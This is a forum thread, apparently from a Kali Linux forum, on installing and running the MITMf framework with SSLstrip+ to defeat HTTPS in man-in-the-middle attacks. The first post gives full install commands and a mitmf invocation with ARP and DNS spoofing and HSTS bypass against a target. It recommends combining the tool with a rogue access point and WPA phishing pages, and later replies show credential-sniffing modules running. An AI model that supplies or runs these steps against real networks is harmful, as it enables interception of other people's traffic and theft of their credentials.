Results 1 to 11 of 11

Thread: Installing MIMTf - SSLslip+ for advanced MITM Attacks

  1. #1
    Join Date
    2013-Jul
    Posts
    844

    Installing MIMTf - SSLslip+ for advanced MITM Attacks

    Want to try and defeat https during a MITM attack with kali2.0?

    MITMf contains sslslip+ and can parse some https requests.

    !!!!If you want to install DO NOT ENTER!!!

    apt-get install mitmf

    You will install a version BUT it will not work

    Go here instead!!!!!

    http://null-byte.wonderhowto.com/how...mitmf-0162322/

    Read it BUT use this address

    git clone https://github.com/CiuffysHub/MITMf

    cd MITMf

    chmod 777 setup-fixed.sh

    ./setup-fixed.sh

    Now load these dependencies

    apt-get install python-pypcap
    pip2 install watchdog
    pip2 install dsnlib


    This program can work very well with PwnStar9.0(PS9) very well indeed.
    If you diable apache2 during PS9 initialization and provide internet access then run

    MITMf# ./mitmf.py -i at0 -l 53 --spoof --hsts --arp --dns --gateway 192.168.1.1 --target 192.168.0.1

    Where:

    at0 is the tap interface made by airbase-ng

    Gateway here is the Gateway the device connected to the internet is using

    gateway 192.168.1.1

    cat /etc/resolv.conf will give you the DNS

    --target 192.168.0.1

    assigned by PS9 to at0 during setup

    We are embedding this module into Pwnstar9.0. This newer version will have a captive portal https passthu Our own andoid phones connected to the rogue and started pumping all their data thru mitmf.

    MTeams

    PS Sorry about the title should be MITMf

    our mistake!!!
    Last edited by mmusket33; 2015-09-17 at 09:31.

  2. #2
    Join Date
    2013-Jul
    Posts
    844
    The impact dependency is now available at:

    https://github.com/CoreSecurity/impacket

    download impact-master

    unzip then

    cd impact-master

    chmod 755 setup.py

    ./setup.py install

    MTeams

  3. #3
    Join Date
    2015-Sep
    Posts
    1
    You did mean "pip2 install dnslib" correct?

  4. #4
    Join Date
    2015-Sep
    Posts
    14
    Have two questions/suggestions:

    1) Why are you using Airbase to create the Fake AP, and not Hostapd (that is more stable and has not loss of connectivity)?
    2) Have you thought to implement it with WPS/PBC rogue AP?

  5. #5
    Join Date
    2013-Jul
    Posts
    844
    To hydrakush

    Suggest you cross reference these addresses in the wonder-how-to link we posted above. The latest info on this program is posted there. MTeams interest here is on how to bring this program into kali2.0. and get it to function.

    Ref Hostapd - This program is not supported by some wifi devices in fact we do not have a device that can use this program. Furthermore our interest in Pwnstar9 is only to get the WPA phishing pages and rogueAP to function in kali2.0. You could write Vulpi the original author and ask him to implement a hostapd module into Pwnstar9 or you can wait till Aerial becomes available for kali2.0. However Aerial does not support web pages - it is though an excellent program. Then there is easy-creds of which we know nothing except to say many users liked this program.

    Reference loss of connectivity with airbase-ng - we are not seeing this - in fact our Pwnstar9.0 beta works very well in kali2.0 much better then older versions of kali - much to our surprise we might add and it has nothing to do with our coding and all to do with the newer kali2.0.

    We know nothing about WPS/PBC sorry

    MTeam
    Last edited by mmusket33; 2015-09-23 at 00:37.

  6. #6
    Join Date
    2015-Sep
    Posts
    14
    I link the forum-page where I found the WPS/PBC rogue AP.
    It's in French, but you can understand it because there are screenshots that explain how to do.

    http://www.crack-wifi.com/forum/topi...c-hostapd.html

  7. #7
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    mmusket33 hi sorry for spam! PLS HELP ME Where is the problem
    http://www42.zippyshare.com/v/i7MJellZ/file.html

    Apache failed to start please resolve then try again
    (Musket Teams have rewritten PwnStar9.0 in an effort to improve WPA Phishing success.)
    Thank you !!

  8. #8
    Quote Originally Posted by hydrakush View Post
    You did mean "pip2 install dnslib" correct?
    Would have successfully installed yet?

  9. #9
    i have installed everything correct but ,there is no reaction...mitmf not working :



    python mitmf.py -i eth0 --gateway 192.168.1.1 --target 192.168.1.100 --spoof --arp --hsts

    ███╗ ███╗██╗████████╗███╗ ███╗███████╗
    ████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
    ██╔████╔██║██║ ██║ ██╔████╔██║█████╗
    ██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝
    ██║ ╚═╝ ██║██║ ██║ ██║ ╚═╝ ██║██║
    ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
    [*] MITMf v0.9.8 - 'The Dark Side'
    |_ Spoof v0.6
    net.ipv4.ip_forward = 1
    | |_ ARP spoofing enabled
    |_ SSLstrip+ v0.4
    | |_ SSLstrip+ by Leonardo Nve running
    |
    |_ Sergio-Proxy v0.2.1 online
    |_ SSLstrip v0.9 by Moxie Marlinspike online
    |
    |_ MITMf-API online
    * Running on http://127.0.0.1:9999/
    |_ Net-Creds v1.0 online
    |_ HTTP server online
    |_ DNSChef v0.4 online
    |_ SMB server online



    its just doing nothing,nothing at all...please help

  10. #10
    Join Date
    2014-Nov
    Location
    Oregon
    Posts
    6
    thanks for the fixed setup!

  11. #11
    Join Date
    2016-Feb
    Posts
    1
    This all tips does not work in the firefox and google chrome. Why??? any suggestions

Similar Threads

  1. MitM attacks with Kali Docker
    By altjx in forum General Archive
    Replies: 0
    Last Post: 2020-08-24, 21:31
  2. Mitm Attacks +sslstrip fixed by updates?
    By ajay85 in forum TroubleShooting Archive
    Replies: 2
    Last Post: 2014-05-03, 03:10

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •